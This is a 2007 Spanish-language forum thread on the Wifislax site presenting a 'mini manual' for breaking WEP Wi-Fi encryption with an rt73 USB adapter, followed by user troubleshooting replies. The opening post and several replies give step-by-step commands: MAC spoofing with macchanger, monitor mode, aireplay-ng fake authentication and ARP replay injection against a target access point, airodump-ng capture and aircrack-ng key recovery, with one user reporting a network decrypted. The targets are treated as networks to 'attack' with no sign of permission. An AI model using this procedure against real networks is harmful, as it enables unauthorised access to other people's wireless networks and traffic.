Autor Tema: Mini manual rt73 + Wifislax  (Leído 109970 veces)

0 Usuarios y 1 Visitante están viendo este tema.

hadrianweb

  • Visitante
Mini manual rt73 + Wifislax
« en: 20-02-2007, 23:58 (Martes) »
Lo primero que debemos hacer es un iwconfig para saber si no detecta el chip rt73 o rt2570, bueno si al lado de rausb0 no pone rt73 hacemos lo siguiente:
Citar
ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
Si si por el contrario no nos detecta el rt73 a estas lineas le añadimos:
Citar
rmmod rt73
rmmod rt2570
modprobe rt73
Para finalizar la configuracion de la tarjeta hacemos lo siguiente:
Citar
ifconfig rausb0 up
iwconfig rausb0 mode monitor
Con esto hecho podemos empezar a utilizar los programas especificos. Hacemos lo siguiente:
Citar
airodump-ng rausb0
Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
Citar
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0
Y en otra terminal distinta hacemos lo siguiente:
Citar
aireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
Citar
airodump-ng -c canal_ap -w nombre_archivo rausb0
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es

Citar
aircrack-ng -z archivo.cap rausb0

Y Ya esta ;D ;D




« Última modificación: 09-03-2008, 10:18 (Domingo) por hadrianweb »

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 17731
    • GNU/Linux Wifislax
Re: Mini manual para rt73
« Respuesta #1 en: 21-02-2007, 22:50 (Miércoles) »
PUes esta bastante claro.


djdava

  • Visitante
Problemas usando el mini manual para rt73
« Respuesta #2 en: 25-04-2007, 14:25 (Miércoles) »
Hola, pues me surge un problema al utilizar los comandos que pone hadrianweb en el mini manual para las rt73. Lo que hago es exactamente lo que pone en ese manual, es decir pongo la rt73 en modo monito, en el mismo canal y con el essid del AP de esta forma:

iwconfig rausb0 mode monitor channel 11 essid default

Despues enxufo el airodump-ng en el canal 11, hago el ataque 1 y despues el ataque 3 igual como pone en el manual y me sale un error, diciendome que no estoy associado al AP y no me suben los data. He probado un monton de cosas y no se ke mas hacer. Os dejo una captura de lo que me pasa, a ver si me podeis ayudar.

P.D: para hacer el atake 1 me cambio la MAC, por la de un cliente que se suele conectar al AP.



Saludos!!

Desconectado Hwagm

  • Administrador
  • *
  • Mensajes: 17731
    • GNU/Linux Wifislax
Re: Problemas usando el mini manual para rt73
« Respuesta #3 en: 25-04-2007, 15:08 (Miércoles) »
si el cliente es wireless, no seria mejor esperar y efectuar directo un ataque 3.

Aparentemente todo esta correcto.

Es cuestion de espera.

¿que velocidad has fijado, me refiero al iwconfig rausb0 rate X?


djdava

  • Visitante
Re: Problemas usando el mini manual para rt73
« Respuesta #4 en: 25-04-2007, 15:36 (Miércoles) »
Tambien he probado de realizar el atake 3 cuando hay cliente conectado, pero me pasa exactamente lo mismo. Coje un ARP , enpiezan a subir los "sent", el data ni se mueve y me aparece el mismo error de desautentificacion.

El rate lo dejo como está por defecto, osea ke no lo toco.

pego aki lo ke me sale en el iwconfig?

Gracias y saludos!

jmvalles

  • Visitante
Re: Problemas usando el mini manual para rt73
« Respuesta #5 en: 26-04-2007, 21:12 (Jueves) »
A mi me pasaba muchas veces esto, hasta que me hice una antena.
Puede ser que la señal sea muy débil

djdava

  • Visitante
Re: Problemas usando el mini manual para rt73
« Respuesta #6 en: 03-05-2007, 14:02 (Jueves) »
Pues he modificado mi C54RU y le he puesto una antenita de una tarjeta pci que tenia por casa y he logrado desencriptar otra red muy rapido y con una inyeccion de 500ivs por segundo (que esta muy bien, o eso creo). Pero la red en cuestion que comentaba antes, sigo sin hacerme con ella. Me sigue pasando exactamente lo mismo. Me esta volviendo lo co el maldito error de desautentificacion!

De todas formas gracias por contestar.

Saludos!

jlara1112

  • Visitante
Dudas con el manual de rt73
« Respuesta #7 en: 07-05-2007, 00:26 (Lunes) »
Hola hadrianweb, gracias por el manual, tengo una rt73 usb y uso wifiway (ya que tengo tambien una broadcom que no me deja cargar wifislax) y hago todos los pasos porque no me la reconoce como rt73 aunque lo de macchanger lo tengo que hacer despues de lo de modprobe rt73 porque sino se me pone en 00:00:00:00:00 o en la original, y con el ataque 1 se me queda en sending autentificatio request y con el ataque 3 no me consigue ningun arp
¿porqué puede ser?

Aunque hoy me ha cogido 6 y ha enviado 300 y pico y se a parado pero creo que era porque había un cliente conectado, los data me han subido muy despacio y creo que era por el cliente, no porque estuviera inyectando. otra pergunta, ¿cuando hay un cliente conectado solo se hace el ataque 3, tambien se hace el 1 con 00:11... o se hace tambien el uno pero cambiando la mac a la suya?

Tambien he probado a cambiar el rate a 1M pero sigue igual.

Cuando hago el ataque 1 en el airodump aparezco como cliente pero se queda en sending autentification request y al rato desaparezco del airodump.

Antes de ver tu manual, haciendo pruebas conseguí que el ataque 1 me dijera succesful pero el ataque 3 no me cogía ningun arp y ademas al rato tambien desaparecia del airodump.

De nuevo muchas gracias por el manual y a ver si me puedes echar una mano ya que con la broadcom despues de mucho intentarlo tiré la toalla y me compre la ralink pensando que iba a conseguirlo sin problemas y todavía no he conseguido inyectar en condiciones.

P.D: ¿En el wifiway que secuencia hay que poner? (wlandecrypter bssid essid ...?)

P.D2: ¿Hay alguna forma de cargar el módulo de la rt73 únicamente despues de haber cargado con ws nohotplug en wifislax? esque no puedo cargar de otra manera.
« Última modificación: 07-05-2007, 00:29 (Lunes) por jlara1112 »

Carballo

  • Visitante
Re: Mini manual para rt73
« Respuesta #8 en: 12-05-2007, 23:27 (Sábado) »
Acabo de comprarme una c54ru (chip rt73) y he estado probando que tal iva. He probado con una wifi y los resultados me parecen que no son los que deberian. En hora y media ha recibido 65000 paquetes y ninguno es ARP. No aparecen errores por ningun sitio y he seguido los todos los pasos sin problemas. Ahora bien, es normal lo que pasa o quizas he echo algo mal?

PD. en la captura se ven los AP, el segundo es con el que he estado probando.



lampi

  • Visitante
Re: Mini manual para rt73
« Respuesta #9 en: 12-05-2007, 23:39 (Sábado) »
No te preocupes que si funciona,

Carballo

  • Visitante
Re: Mini manual para rt73
« Respuesta #10 en: 12-05-2007, 23:43 (Sábado) »
entonces es normal?

pues mañana lo dejare mas tiempo a ver si pilla algun ARP y os cuento :)

Carballo

  • Visitante
Re: Mini manual para rt73
« Respuesta #11 en: 13-05-2007, 18:39 (Domingo) »
nada de nada, mas de 300.000 paquetes y ni uno solo ARP, buscando por ahi he visto alguna solucion usando el airodump-ptw

hadrianweb

  • Visitante
Re: Mini manual para rt73
« Respuesta #12 en: 13-05-2007, 22:35 (Domingo) »
si el aircrack-ptw solo necesita 50000ivs para revolverla.

Y sino utiliza el ataque 0 para acelerar el proceso, eso si hay cliente conectados ;D ;D

Carballo

  • Visitante
Re: Mini manual para rt73
« Respuesta #13 en: 13-05-2007, 23:17 (Domingo) »
el fin de semana no habia nadie conectado y entre semana no podre asi que habra que esperar hasta el fin de semana que viene

Carballo

  • Visitante
Re: Mini manual para rt73
« Respuesta #14 en: 19-05-2007, 17:11 (Sábado) »
he estado probando y no hay forma de que se asocie con ninguna ap, ni on un cliente ni de ninguna otra forma. Lo intenta unas cuantas veces y salta un error dando unas posibles motivos por los que no ha podido asociarse

hadrianweb

  • Visitante
Re: Mini manual para rt73
« Respuesta #15 en: 20-05-2007, 23:42 (Domingo) »
En primer luego deberias bajar el rate, es decir

Código: [Seleccionar]
iwconfig rausb0 rate 1M
Si el error continua es probable que sea por que te encuentres muy lejos del ap

jmvalles

  • Visitante
Re: Mini manual para rt73
« Respuesta #16 en: 21-05-2007, 00:55 (Lunes) »
hadrianweb...¿qué se consigue bajando el rate?
¿equilibrar la subida/bajada? es que no lo acabo de pillar..... ???

hadrianweb

  • Visitante
Re: Mini manual para rt73
« Respuesta #17 en: 21-05-2007, 01:01 (Lunes) »
Jeje, mira esto

Citar
rate/bit[rate]
    For cards supporting multiple bit rates, set the bit-rate in b/s. The
    bit-rate is the speed at which bits are transmitted over the medium, the user speed of the link is lower due to medium sharing and overhead.
    You must append the suffix k, M or G to the value (decimal multiplier : 10^3, 10^6 and 10^9 b/s), or add enough '0'. Values below 1000 are card specific, usually an index in the bit-rate list. Use auto to select the automatic bit-rate mode (fallback to lower rate on noisy channels), which is the default for most cards, and fixed to revert back to fixed setting. If you specify a bit-rate value and append auto, the driver will use all bit lower and equal than this value.
    Examples :
    iwconfig eth0 rate 11M
    iwconfig eth0 rate auto
    iwconfig eth0 rate 5.5M auto

Si quieres te lo traduzco pero no creo que sea necesario ;D ;D

adrian_oca

  • Visitante
Re: Mini manual para rt73
« Respuesta #18 en: 14-06-2007, 01:29 (Jueves) »
En primer luego deberias bajar el rate, es decir

Código: [Seleccionar]
iwconfig rausb0 rate 1M
Si el error continua es probable que sea por que te encuentres muy lejos del ap

Perdón por no haberme presentado antes, yo tengo el mismo problema que tratan aquí, bajo muchos paquetes pero casi nada de datos ni ARP, voy a intentar esto y luego les comento.

mi problema es este:

Este fin de semana pasado se me presentó un problema que no había visto, ya cuando lanzaba el ataque con el WIFISLAX si me capturaba un muchos paquetes pero muy pocos IV´s o datos, las peticiones ARP también eran muy pocas, por ejemplo:

Los paquetes ya sumaban alrededor de 600,000 y los IV´s eran como 200 y las ARP eran como 40... y eso que me pasé como dos horas ahí mondadeando... 

Ya he estado leyendo y según esto puede ser por 4 razones:

1.-Te encuentras demasiado lejos del punto de acceso.
2.-No hay tráfico en la red escogida.
3.-Hay tráfico de tipo G pero estás capturando en modo B.
4.-Hay algún problema con tu tarjeta (¿problema de firmware ?)


Quizá pueda ser por la distancia, pregunta: ¿Puede ser esto posible aunque reciba 45% de señal del AP?

Después seguí leyendo y se me hace más real esto:

Algunos puntos de acceso requieren de reautentificación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:

aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 ath0

Si este fuese mi problema y ya que yo uso el controlador rt2570 (Ralink b/g USB) al momento de darlo "de alta" lo identifico como "rausb0", pregunta:

¿En la sentencia aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 ath0 es correcto terminar con "ath0" o le pongo "rausb0"?

Agradezco a todos de antemano, espero y me puedan resolver mi duda...

lagartija

  • Visitante
Re: Mini manual para rt73
« Respuesta #19 en: 14-06-2007, 07:39 (Jueves) »
hola
te respondo rapidamente.. tu interfase es usb osea esta identificada como rasub0...

el comando que tienes que poner es

aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 rausb0

ceo que te respondias solito.. pero por si las dudas..

saludos :) :) :) :) :) :)